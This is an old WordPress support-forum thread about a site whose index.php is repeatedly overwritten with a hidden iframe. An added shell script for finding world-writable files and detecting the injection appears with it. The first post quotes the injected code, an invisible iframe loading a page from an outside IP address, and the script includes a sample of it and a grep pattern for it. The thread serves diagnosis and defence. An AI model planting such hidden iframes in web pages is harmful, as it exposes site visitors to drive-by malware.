WordPress.org

hacking wordpress (12 posts)

  1. gcicoira
    Member
    Posted 8 years ago #

    Hi, I have a problem with WordPress 2.0.5.
    Periodically my first page (index.php) was overwritten with this code:
    --------------------------------------------------------
    <iframe src="http://81.29.241.232/user2/adam0111/index.php" width="150" height="150" style="display:none"></iframe>
    <?php
    /* Short and sweet */
    define('WP_USE_THEMES', true);
    require('./wp-blog-header.php');
    ?>
    ---------------------------------------------------------

    see:
    http://www.cicoira.it

    Can I prevent this attack?

    Thanks for the help!

  2. moshu
    Member
    Posted 8 years ago #

    1. Inform your host immediately about the hack. It might happen server-wide.
    2. Make sure you don't have any file or folder that is world writable (chmod 666 and 777, respectively).

    You may also want to read: http://codex.wordpress.org/Hardening_Wordpress

  3. drmike
    Member
    Posted 8 years ago #

    A quick Google search and some rough translating shows that that's probably the TR/Click.Small.KJ.31 virus. Not sure if that would be for the server or your own PC when you uploaded the files.

  4. PozHonks
    Member
    Posted 8 years ago #

    Upload a good version of the index.php file and set the file permission to 444 (read only access, no write).
    If you need to change something, change the file permission to 644, do your editing, then come back to 444.
    It should protect you (not 100% guaranteed)
    You can do the same with the wp-config.php file.
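
An added example, not part of any post in this thread: a shell script for the checks suggested in the replies above (find world-writable files, make index.php and wp-config.php read-only) plus a search for the hidden iframe shown in the first post. The function names, the `example.invalid` URL and the throwaway sample tree are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: paths, function names and sample files are constructed.

# Files and directories any local user can write to (modes such as 666, 777).
world_writable() {
    find "$1" \( -type f -o -type d \) -perm -0002 -print
}

# PHP files carrying an <iframe> hidden with display:none, the shape of the
# snippet prepended to index.php in the first post.
hidden_iframes() {
    find "$1" -type f -name '*.php' \
        -exec grep -liE '<iframe[^>]*display:[[:space:]]*none' {} + || true
}

# Drop the world-write bit everywhere, then make the named files read-only.
lock_down() {
    root=$1; shift
    find "$root" \( -type f -o -type d \) -perm -0002 -exec chmod o-w {} +
    for f in "$@"; do chmod 444 "$root/$f"; done
}

# Demo on a throwaway tree so no real site is touched.
demo() {
    site=$(mktemp -d)
    printf '%s\n' \
        '<iframe src="http://example.invalid/" style="display:none"></iframe>' \
        '<?php' "require('./wp-blog-header.php');" > "$site/index.php"
    printf '%s\n' '<?php' '// constructed clean file' > "$site/wp-config.php"
    mkdir "$site/wp-content"
    chmod 666 "$site/index.php"
    chmod 777 "$site/wp-content"
    echo "World-writable:"; world_writable "$site"
    echo "Hidden iframe in:"; hidden_iframes "$site"
    lock_down "$site" index.php wp-config.php
    echo "World-writable after lock_down: $(world_writable "$site" | wc -l)"
    rm -rf "$site"
}

demo
```

An attacker who logs in over FTP as the file owner, which is what the end of this thread turns out to describe, can change these modes back, so the iframe search is the part worth running on a schedule.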

  5. gcicoira
    Member
    Posted 8 years ago #

    Hi,
    If I change the index.php permission to 444, I have this error:

    Internal Server Error
    The server encountered an internal error or misconfiguration and was unable to complete your request.

    Please contact the server administrator, postmaster@cicoira.it and inform them of the time the error occurred, and anything you might have done that may have caused the error.

    More information about this error may be available in the server error log.

    With permission 644, the file index.php will be replaced with the hacking code...

    Help

  6. moshu
    Member
    Posted 8 years ago #

    You mean you put up a clean file and it gets infected instantly?
    What did your host say when you contacted them?

  7. gcicoira
    Member
    Posted 8 years ago #

    Hi,

    My host says that it is a WordPress code problem.
    For my host it's all OK.

    My index.php is replaced every Monday.

    Any idea?

    Thanks

  8. gcicoira
    Member
    Posted 8 years ago #

    Help

  9. Get a new host. It's not a WordPress code problem, and if they're not willing to help you fix it, then you don't need to be dealing with them.

  10. drmike
    Member
    Posted 8 years ago #

    Gotta agree. We've already told you the issue. Either your computer or your host's computer is infected.

  11. bradyjfrey
    Member
    Posted 8 years ago #

    3rd agree, get a new host, that's not a WordPress vulnerability.

  12. gcicoira
    Member
    Posted 8 years ago #

    Eureka!

    I have resolved my problem... I managed my blog with Net2ftp on my website http://www.cicoira.it/ftp and someone has sniffed my username/password. I have changed my FTP password for the website and I haven't got any problems.

    Thanks

    Gianpiero

Topic Closed

This topic has been closed to new replies.
